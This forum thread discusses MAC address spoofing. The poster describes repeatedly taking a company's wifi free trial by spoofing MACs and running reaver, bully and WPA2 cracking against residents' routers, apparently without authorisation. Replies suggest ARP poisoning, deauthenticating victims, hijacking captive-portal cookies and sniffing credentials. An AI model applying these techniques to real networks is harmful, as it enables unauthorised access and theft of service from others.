Macchanger - Spoofing your MAC Address

Sorry, been doing a lot of studying as of late and was a little tired in the early hours last night, let me further explain the setup. In said community, theres a wifi hotspot, well from what i can see a bunch of them, it starts as an open network, that proxies you to a login page. If you are not a member, you can sign up for short free trial, which as far as i can tell is only filtered by mac address, so ive been doing that. From what I’ve been able to tell, when you are an actual customer, you get a modem, which i believe to be a cisco one, and then it looks to create their own personal wifi and essid but from what I can tell , ( bare with me as im learning xD) its still piggy backing on the same connection the opn connections are coming from.

Im going to do more dabbling today, but a point in the right direction would be awesome

Last night after reading, i used airodump-ng and looked for these personal hotspots with devices on them, spoofed a devices mac and seen what happened, which wasnt much of course cause i still needed the routers WPA2 passphrase.

Another thing ive noticed is that the airodump scan returns results like such:

companywifi — this is the open wifi
eddieswifi – this is wpa2
randomwifi — this is wpa2

the odd thing is that these little clusters all carry the SAME mac addresses except for maybe 1 or 2 varying numbers/letters. Im sure these are all connected because of their signal power.

I’ve done a few amount of reaver attacks on the wps enabled ones to no avail, as well as bully.

And unfortunately have not cracked the wpa2 yet,

Sorry for the long post but this setup is intriguing the hell out of me xD.

Oh, also, from what i can see the base router/s that is pumping out the hotspots are WEP based, but due to the size of this company, did not wanna dabble with that just quite yet.

Thanks,
doobs

@pry0cc I’m not saying it’s impossible but you are not that descriptive with how exactly you do it. Using a tool without knowing what’s going on under the hood is a bit skiddy. Keep in mind MAC addresses are one of a kind (in 99% of the cases). In serious networks, MAC spoofing is nearly impossible.

My deal is this:

• Two computers are both online on the same network.
• One computer is the rightful owner of some MAC address. This computer was connected to the network first.
• Then I come along and change my MAC address to be the same as the other computer’s.

My questions:

1. Do I get the same IP as the other guy if I do this, since the MAC is the same?
2. How do I know if the packets are routed to the right machine?

There is no way 2 machines will be working properly if both of them are online and they are using the same MAC address. It just doesn’t make any sense. The attack I’ve accomplished at least is by hijacking the ARP cache and when the target machine is offline, then use its MAC address. Check out the command arp -a. This attack is also known as ARP Poisoning.

@oaktree
To answer you questions from my experiences I made:

1. No, you don’t get the same IP adress, a normal router would recognize this and throw a duplicated IP error. Furthermore you will get strange symptoms when two systems on the same subnet have the same IP address, cause the packets are not forwarded correctly.

2. What I noticed when I spoofed a MAC address was, that it will deauthenticate the other user who was connected at the first place, maybe because their hotspot router thought "oh the client with this known MAC address updated with a new IP (maybe it has something to do with the TTL as well?). When the other actual user will now connect again, I got deauthenticated.

This might be not for every hotspot / router but it is what I experienced.
If I have the time I’m going to try this on my own network and then I’m going to do a tcpdump with Wireshark. Then it should be more clear what is happening.
But again, some routers may behave different.

That’s just what I experienced. I may be totally wrong though. If somebody knows more, please let me know.

You guys are funny. Thanks

IMHO, you can’t have two same MACs or IPs on the network, because you would get all types of switching problems (MACs) or collisions (IPs).

But, what you could do (only in case of wifi) is to deauth the victim and take it’s place on the network. Then the victim gets all the errors and connectivity problems, but if it’s ‘just a user’, they will ‘just think the net sucks’.
In this case, IP assignment is irrelevant, because the network most probably uses dynamic addressing, so the client addresses change relatively regularly.

In the case that network access is not controlled by some form of MAC filtering, but by a Captive Portal (usn/psw), you can hijack a login cookie and use it to register on the network. Catch here is cookie validation in the CaptivePortal, but in a lot of cases you’ll see a cheap implementation of CP, or a CP which runs on defaults.
On the same line of thought, you could also sniff for credentials.

And in the thread there were mentions of other auth systems used in wifi implementations - if the network is using a directory based SSO solution (AD+RADIUS (Kerberos), SAMBA+Kerberos), you’ll have to obtain the creds from inside the network.

Those were my 2 cents, feedback welcome…

This topic was automatically closed after 30 days. New replies are no longer allowed.